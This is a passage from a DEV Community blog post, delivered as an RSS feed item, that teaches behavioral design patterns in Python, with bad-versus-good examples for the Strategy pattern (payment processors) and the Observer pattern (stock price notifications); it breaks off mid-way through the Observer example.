DEV Community: Mahdi SHamlou | مهدی شاملو The latest articles on DEV Community by Mahdi SHamlou | مهدی شاملو (@mahdi0shamlou). https://dev.to/mahdi0shamlou https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3697084%2Fa7962611-bef0-4ef6-b527-49cb9cdff5aa.jpeg DEV Community: Mahdi SHamlou | مهدی شاملو https://dev.to/mahdi0shamlou en Mahdi Shamlou | Behavioral Design Patterns 2026: Strategy, Observer, Command, State & More — Production Examples Mahdi SHamlou | مهدی شاملو Wed, 17 Jun 2026 19:06:13 +0000 https://dev.to/mahdi0shamlou/mahdi-shamlou-behavioral-design-patterns-2026-strategy-observer-command-state-more--3k36 https://dev.to/mahdi0shamlou/mahdi-shamlou-behavioral-design-patterns-2026-strategy-observer-command-state-more--3k36 <p><a href="https://dev.to/mahdi0shamlou">Mahdi Shamlou</a> here.</p> <p>You've mastered <strong>Creational Patterns</strong>. You understand how to build objects.</p> <p>You've conquered <strong>Structural Patterns</strong>. You know how to organize relationships between objects.</p> <p>Now it's time for the final piece: <strong>Behavioral Design Patterns</strong>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wcvchk5r8qdxpq0z2vv.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wcvchk5r8qdxpq0z2vv.png" alt="Mahdi Shamlou" width="800" height="450"></a></p> <p>This is where things get interesting.</p> <p>Behavioral patterns answer the hardest question in software design:</p> <blockquote> <p><strong>How should objects communicate and collaborate?</strong></p> </blockquote> <p>I've seen systems where:</p> <ul> <li>Objects were tightly coupled, making changes impossible</li> <li>State management was scattered everywhere</li> <li>Adding new behaviors required modifying dozens of classes</li> <li>Event handling was chaotic and unmaintainable</li> <li>Control flow was buried in complex conditionals</li> </ul> <p>Most of these problems disappear when you apply the right behavioral pattern.</p> <p>The difference between junior and senior developers often comes down to how well they manage behavior and communication between objects.</p> <p>Let's dive into the patterns that separate them.</p> <h2> What Are Behavioral Design Patterns? </h2> <p>Behavioral patterns focus on <strong>how objects interact and distribute responsibility</strong>.</p> <p>While Creational patterns ask: <em>"How do I create objects?"</em></p> <p>And Structural patterns ask: <em>"How do I organize objects?"</em></p> <p>Behavioral patterns ask: <em>"How do objects talk to each other? Who does what?"</em></p> <p>The behavioral patterns are:</p> <ol> <li>Strategy — Choose an algorithm at runtime</li> <li>Observer — Notify multiple objects about state changes</li> <li>Command — Encapsulate requests as objects</li> <li>State — Change behavior based on internal state</li> <li>Template Method — Define algorithm structure, let subclasses fill in details</li> <li>Chain of Responsibility — Pass requests through handlers</li> <li>Iterator — Traverse collections without exposing implementation details</li> <li>Mediator — Centralize communication between objects</li> <li>Memento — Save and restore object state</li> <li>Visitor — Add operations without changing existing classes</li> <li>Interpreter — Define and evaluate a custom language or grammar</li> </ol> <p>Let's explore each with production code.</p> <h2> Behavioral Patterns That Matter </h2> <h3> 1. Strategy Pattern </h3> <p>The Strategy pattern defines a family of algorithms, encapsulates each one, and makes them interchangeable.</p> <p>It lets the algorithm vary independently from clients that use it.</p> <p>Imagine a payment system. You support:</p> <ul> <li>Credit card payments</li> <li>PayPal</li> <li>Stripe</li> <li>Bitcoin</li> </ul> <p>Without Strategy, your checkout code becomes a giant conditional:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">if</span> <span class="n">payment_method</span> <span class="o">==</span> <span class="sh">"</span><span class="s">credit_card</span><span class="sh">"</span><span class="p">:</span> <span class="c1"># 50 lines of credit card logic </span><span class="k">elif</span> <span class="n">payment_method</span> <span class="o">==</span> <span class="sh">"</span><span class="s">paypal</span><span class="sh">"</span><span class="p">:</span> <span class="c1"># 50 lines of PayPal logic </span><span class="k">elif</span> <span class="n">payment_method</span> <span class="o">==</span> <span class="sh">"</span><span class="s">stripe</span><span class="sh">"</span><span class="p">:</span> <span class="c1"># 50 lines of Stripe logic # ... nightmare </span></code></pre> </div> <p>With Strategy, each payment method is a separate, interchangeable algorithm.</p> <p><strong>When to use it:</strong></p> <ul> <li>Multiple algorithms for a task</li> <li>Different payment methods</li> <li>Compression algorithms (zip, gzip, rar)</li> <li>Sorting algorithms (quicksort, mergesort, bubblesort)</li> <li>Data export formats (JSON, CSV, XML)</li> <li>Pricing strategies (standard, premium, enterprise)</li> <li>Search/filtering strategies</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">PaymentProcessor</span><span class="p">:</span> <span class="k">def</span> <span class="nf">process_payment</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">,</span> <span class="n">method</span><span class="p">):</span> <span class="k">if</span> <span class="n">method</span> <span class="o">==</span> <span class="sh">"</span><span class="s">credit_card</span><span class="sh">"</span><span class="p">:</span> <span class="c1"># 30 lines of credit card processing </span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with credit card</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Validating card...</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Checking fraud detection...</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Charging card...</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Payment complete</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">elif</span> <span class="n">method</span> <span class="o">==</span> <span class="sh">"</span><span class="s">paypal</span><span class="sh">"</span><span class="p">:</span> <span class="c1"># 30 lines of PayPal processing </span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with PayPal</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Redirecting to PayPal...</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Waiting for PayPal confirmation...</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Payment complete</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">elif</span> <span class="n">method</span> <span class="o">==</span> <span class="sh">"</span><span class="s">bitcoin</span><span class="sh">"</span><span class="p">:</span> <span class="c1"># 30 lines of Bitcoin processing </span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with Bitcoin</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Generating wallet address...</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Waiting for blockchain confirmation...</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Payment complete</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">else</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">ValueError</span><span class="p">(</span><span class="sh">"</span><span class="s">Unknown payment method</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Every new payment method requires modifying this class </span><span class="n">processor</span> <span class="o">=</span> <span class="nc">PaymentProcessor</span><span class="p">()</span> <span class="n">processor</span><span class="p">.</span><span class="nf">process_payment</span><span class="p">(</span><span class="mi">100</span><span class="p">,</span> <span class="sh">"</span><span class="s">credit_card</span><span class="sh">"</span><span class="p">)</span> <span class="n">processor</span><span class="p">.</span><span class="nf">process_payment</span><span class="p">(</span><span class="mi">100</span><span class="p">,</span> <span class="sh">"</span><span class="s">paypal</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p><strong>Problems:</strong></p> <ul> <li>Giant conditional logic</li> <li>Hard to test each strategy</li> <li>Hard to add new strategies</li> <li>Violates Single Responsibility Principle</li> </ul> <h3> Good code (with Strategy) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="c1"># Strategy interface </span><span class="k">class</span> <span class="nc">PaymentStrategy</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">pay</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># Concrete strategies </span><span class="k">class</span> <span class="nc">CreditCardStrategy</span><span class="p">(</span><span class="n">PaymentStrategy</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">card_number</span><span class="p">,</span> <span class="n">cvv</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">card_number</span> <span class="o">=</span> <span class="n">card_number</span> <span class="n">self</span><span class="p">.</span><span class="n">cvv</span> <span class="o">=</span> <span class="n">cvv</span> <span class="k">def</span> <span class="nf">pay</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with credit card </span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">card_number</span><span class="p">[</span><span class="o">-</span><span class="mi">4</span><span class="si">:</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Validating card...</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Checking fraud detection...</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Charging card...</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">class</span> <span class="nc">PayPalStrategy</span><span class="p">(</span><span class="n">PaymentStrategy</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">email</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">email</span> <span class="o">=</span> <span class="n">email</span> <span class="k">def</span> <span class="nf">pay</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with PayPal (</span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">email</span><span class="si">}</span><span class="s">)</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Redirecting to PayPal...</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Waiting for PayPal confirmation...</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">class</span> <span class="nc">BitcoinStrategy</span><span class="p">(</span><span class="n">PaymentStrategy</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">wallet_address</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">wallet_address</span> <span class="o">=</span> <span class="n">wallet_address</span> <span class="k">def</span> <span class="nf">pay</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with Bitcoin to </span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">wallet_address</span><span class="p">[</span><span class="si">:</span><span class="mi">10</span><span class="p">]</span><span class="si">}</span><span class="s">...</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Generating transaction...</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Waiting for blockchain confirmation...</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">class</span> <span class="nc">StripeStrategy</span><span class="p">(</span><span class="n">PaymentStrategy</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">stripe_token</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">stripe_token</span> <span class="o">=</span> <span class="n">stripe_token</span> <span class="k">def</span> <span class="nf">pay</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with Stripe</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Contacting Stripe API...</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Payment successful</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">True</span> <span class="c1"># Context: Uses the strategy </span><span class="k">class</span> <span class="nc">PaymentProcessor</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">strategy</span><span class="p">:</span> <span class="n">PaymentStrategy</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">strategy</span> <span class="o">=</span> <span class="n">strategy</span> <span class="k">def</span> <span class="nf">process_payment</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">strategy</span><span class="p">.</span><span class="nf">pay</span><span class="p">(</span><span class="n">amount</span><span class="p">)</span> <span class="c1"># Client code: Simple and flexible </span><span class="n">credit_card</span> <span class="o">=</span> <span class="nc">CreditCardStrategy</span><span class="p">(</span><span class="sh">"</span><span class="s">4111111111111111</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">123</span><span class="sh">"</span><span class="p">)</span> <span class="n">processor</span> <span class="o">=</span> <span class="nc">PaymentProcessor</span><span class="p">(</span><span class="n">credit_card</span><span class="p">)</span> <span class="n">processor</span><span class="p">.</span><span class="nf">process_payment</span><span class="p">(</span><span class="mi">100</span><span class="p">)</span> <span class="n">paypal</span> <span class="o">=</span> <span class="nc">PayPalStrategy</span><span class="p">(</span><span class="sh">"</span><span class="s">user@example.com</span><span class="sh">"</span><span class="p">)</span> <span class="n">processor</span> <span class="o">=</span> <span class="nc">PaymentProcessor</span><span class="p">(</span><span class="n">paypal</span><span class="p">)</span> <span class="n">processor</span><span class="p">.</span><span class="nf">process_payment</span><span class="p">(</span><span class="mi">100</span><span class="p">)</span> <span class="n">bitcoin</span> <span class="o">=</span> <span class="nc">BitcoinStrategy</span><span class="p">(</span><span class="sh">"</span><span class="s">1A1z7agoat</span><span class="sh">"</span><span class="p">)</span> <span class="n">processor</span> <span class="o">=</span> <span class="nc">PaymentProcessor</span><span class="p">(</span><span class="n">bitcoin</span><span class="p">)</span> <span class="n">processor</span><span class="p">.</span><span class="nf">process_payment</span><span class="p">(</span><span class="mi">100</span><span class="p">)</span> <span class="c1"># Add new strategy? Just create a new class, no modifications needed </span></code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Easy to add new algorithms</li> <li>Eliminates large conditional statements</li> <li>Makes algorithms interchangeable</li> <li>Each strategy is testable in isolation</li> <li>Follows Single Responsibility Principle</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>More classes to manage</li> <li>Overhead for simple cases</li> <li>Clients need to know which strategy to choose</li> </ul> <p><strong>My Take:</strong></p> <p>Strategy is one of the most practical patterns in real production systems.</p> <p>Every time you see a big if-elif-elif chain, think Strategy. It's almost always the right answer.</p> <p>Payment methods, export formats, sorting algorithms, caching strategies—they're all perfect use cases for Strategy.</p> <p>The key insight: <strong>If you're choosing between different ways to do something, Strategy is your pattern.</strong></p> <h3> 2. Observer Pattern </h3> <p>The Observer pattern defines a one-to-many dependency between objects so that when one object changes state, all its dependents are notified automatically.</p> <p>Think about a stock ticker. When a stock price changes, multiple traders, monitors, and alerts need to know immediately.</p> <p>Without Observer, the stock would need to know about every trader, monitor, and alert (tight coupling).</p> <p>With Observer, the stock simply notifies anyone who's interested.</p> <p><strong>When to use it:</strong></p> <ul> <li>Event systems (UI buttons, input fields)</li> <li>Stock ticker systems</li> <li>Real-time notifications</li> <li>MVC architectures (model changes notify views)</li> <li>Pub/Sub systems</li> <li>Event-driven architecture</li> <li>Social media (following users)</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">Stock</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">price</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">symbol</span> <span class="o">=</span> <span class="n">symbol</span> <span class="n">self</span><span class="p">.</span><span class="n">price</span> <span class="o">=</span> <span class="n">price</span> <span class="n">self</span><span class="p">.</span><span class="n">traders</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">self</span><span class="p">.</span><span class="n">monitors</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">self</span><span class="p">.</span><span class="n">alerts</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">set_price</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">new_price</span><span class="p">):</span> <span class="n">old_price</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">price</span> <span class="n">self</span><span class="p">.</span><span class="n">price</span> <span class="o">=</span> <span class="n">new_price</span> <span class="c1"># The stock knows about all these systems (bad coupling!) </span> <span class="k">for</span> <span class="n">trader</span> <span class="ow">in</span> <span class="n">self</span><span class="p">.</span><span class="n">traders</span><span class="p">:</span> <span class="n">trader</span><span class="p">.</span><span class="nf">notify_price_change</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">symbol</span><span class="p">,</span> <span class="n">old_price</span><span class="p">,</span> <span class="n">new_price</span><span class="p">)</span> <span class="k">for</span> <span class="n">monitor</span> <span class="ow">in</span> <span class="n">self</span><span class="p">.</span><span class="n">monitors</span><span class="p">:</span> <span class="n">monitor</span><span class="p">.</span><span class="nf">update_display</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">symbol</span><span class="p">,</span> <span class="n">new_price</span><span class="p">)</span> <span class="k">for</span> <span class="n">alert</span> <span class="ow">in</span> <span class="n">self</span><span class="p">.</span><span class="n">alerts</span><span class="p">:</span> <span class="n">alert</span><span class="p">.</span><span class="nf">check_threshold</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">symbol</span><span class="p">,</span> <span class="n">new_price</span><span class="p">)</span> <span class="k">def</span> <span class="nf">register_trader</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">trader</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">traders</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">trader</span><span class="p">)</span> <span class="k">def</span> <span class="nf">register_monitor</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">monitor</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">monitors</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">monitor</span><span class="p">)</span> <span class="k">def</span> <span class="nf">register_alert</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">alert</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">alerts</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">alert</span><span class="p">)</span> <span class="c1"># Stock knows too much about its dependents </span></code></pre> </div> <p><strong>Problems:</strong></p> <ul> <li>Stock is tightly coupled to all observers</li> <li>Adding new observer types requires modifying Stock</li> <li>Hard to test</li> <li>Violates Single Responsibility</li> </ul> <h3> Good code (with Observer) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="c1"># Observer interface </span><span class="k">class</span> <span class="nc">StockObserver</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">update</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">price</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># Subject </span><span class="k">class</span> <span class="nc">Stock</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">price</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">symbol</span> <span class="o">=</span> <span class="n">symbol</span> <span class="n">self</span><span class="p">.</span><span class="n">price</span> <span class="o">=</span> <span class="n">price</span> <span class="n">self</span><span class="p">.</span><span class="n">_observers</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">attach</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">observer</span><span class="p">:</span> <span class="n">StockObserver</span><span class="p">):</span> <span class="sh">"""</span><span class="s">Subscribe an observer</span><span class="sh">"""</span> <span class="k">if</span> <span class="n">observer</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">self</span><span class="p">.</span><span class="n">_observers</span><span class="p">:</span> <span class="n">self</span><span class="p">.</span><span class="n">_observers</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">observer</span><span class="p">)</span> <span class="k">def</span> <span class="nf">detach</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">observer</span><span class="p">:</span> <span class="n">StockObserver</span><span class="p">):</span> <span class="sh">"""</span><span class="s">Unsubscribe an observer</span><span class="sh">"""</span> <span class="n">self</span><span class="p">.</span><span class="n">_observers</span><span class="p">.</span><span class="nf">remove</span><span class="p">(</span><span class="n">observer</span><span class="p">)</span> <span class="k">def</span> <span class="nf">notify</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="sh">"""</span><span class="s">Notify all observers of changes</span><span class="sh">"""</span> <span class="k">for</span> <span class="n">observer</span> <span class="ow">in</span> <span class="n">self</span><span class="p">.</span><span class="n">_observers</span><span class="p">:</span> <span class="n">observer</span><span class="p">.</span><span class="nf">update</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">symbol</span><span class="p">,</span> <span class="n">self</span><span class="p">.</span><span class="n">price</span><span class="p">)</span> <span class="k">def</span> <span class="nf">set_price</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">new_price</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">symbol</span><span class="si">}</span><span class="s"> price changed from $</span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">price</span><span class="si">}</span><span class="s"> to $</span><span class="si">{</span><span class="n">new_price</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">self</span><span class="p">.</span><span class="n">price</span> <span class="o">=</span> <span class="n">new_price</span> <span class="n">self</span><span class="p">.</span><span class="nf">notify</span><span class="p">()</span> <span class="c1"># Notify all interested parties </span> <span class="c1"># Concrete observers </span><span class="k">class</span> <span class="nc">Trader</span><span class="p">(</span><span class="n">StockObserver</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">name</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span> <span class="k">def</span> <span class="nf">update</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">price</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Trader </span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">name</span><span class="si">}</span><span class="s">: </span><span class="si">{</span><span class="n">symbol</span><span class="si">}</span><span class="s"> is now $</span><span class="si">{</span><span class="n">price</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">class</span> <span class="nc">Monitor</span><span class="p">(</span><span class="n">StockObserver</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">name</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span> <span class="k">def</span> <span class="nf">update</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">price</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Monitor </span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">name</span><span class="si">}</span><span class="s">: Updating display for </span><span class="si">{</span><span class="n">symbol</span><span class="si">}</span><span class="s"> = $</span><span class="si">{</span><span class="n">price</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">class</span> <span class="nc">PriceAlert</span><span class="p">(</span><span class="n">StockObserver</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">threshold</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span> <span class="n">self</span><span class="p">.</span><span class="n">threshold</span> <span class="o">=</span> <span class="n">threshold</span> <span class="k">def</span> <span class="nf">update</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">price</span><span class="p">):</span> <span class="k">if</span> <span class="n">price</span> <span class="o">&gt;</span> <span class="n">self</span><span class="p">.</span><span class="n">threshold</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Alert </span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">name</span><span class="si">}</span><span class="s">: </span><span class="si">{</span><span class="n">symbol</span><span class="si">}</span><span class="s"> exceeded threshold! Price: $</span><span class="si">{</span><span class="n">price</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Client code </span><span class="n">apple</span> <span class="o">=</span> <span class="nc">Stock</span><span class="p">(</span><span class="sh">"</span><span class="s">AAPL</span><span class="sh">"</span><span class="p">,</span> <span class="mi">150</span><span class="p">)</span> <span class="c1"># Attach observers </span><span class="n">trader1</span> <span class="o">=</span> <span class="nc">Trader</span><span class="p">(</span><span class="sh">"</span><span class="s">Alice</span><span class="sh">"</span><span class="p">)</span> <span class="n">trader2</span> <span class="o">=</span> <span class="nc">Trader</span><span class="p">(</span><span class="sh">"</span><span class="s">Bob</span><span class="sh">"</span><span class="p">)</span> <span class="n">monitor</span> <span class="o">=</span> <span class="nc">Monitor</span><span class="p">(</span><span class="sh">"</span><span class="s">Dashboard</span><span class="sh">"</span><span class="p">)</span> <span class="n">alert</span> <span class="o">=</span> <span class="nc">PriceAlert</span><span class="p">(</span><span class="sh">"</span><span class="s">HighAlert</span><span class="sh">"</span><span class="p">,</span> <span class="mi">155</span><span class="p">)</span> <span class="n">apple</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="n">trader1</span><span class="p">)</span> <span class="n">apple</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="n">trader2</span><span class="p">)</span> <span class="n">apple</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="n">monitor</span><span class="p">)</span> <span class="n">apple</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="n">alert</span><span class="p">)</span> <span class="c1"># Stock doesn't know about specific observer types # Just notifies them </span><span class="n">apple</span><span class="p">.</span><span class="nf">set_price</span><span class="p">(</span><span class="mi">152</span><span class="p">)</span> <span class="n">apple</span><span class="p">.</span><span class="nf">set_price</span><span class="p">(</span><span class="mi">156</span><span class="p">)</span> <span class="c1"># Alert triggers </span> <span class="c1"># Detach if needed </span><span class="n">apple</span><span class="p">.</span><span class="nf">detach</span><span class="p">(</span><span class="n">trader1</span><span class="p">)</span> <span class="n">apple</span><span class="p">.</span><span class="nf">set_price</span><span class="p">(</span><span 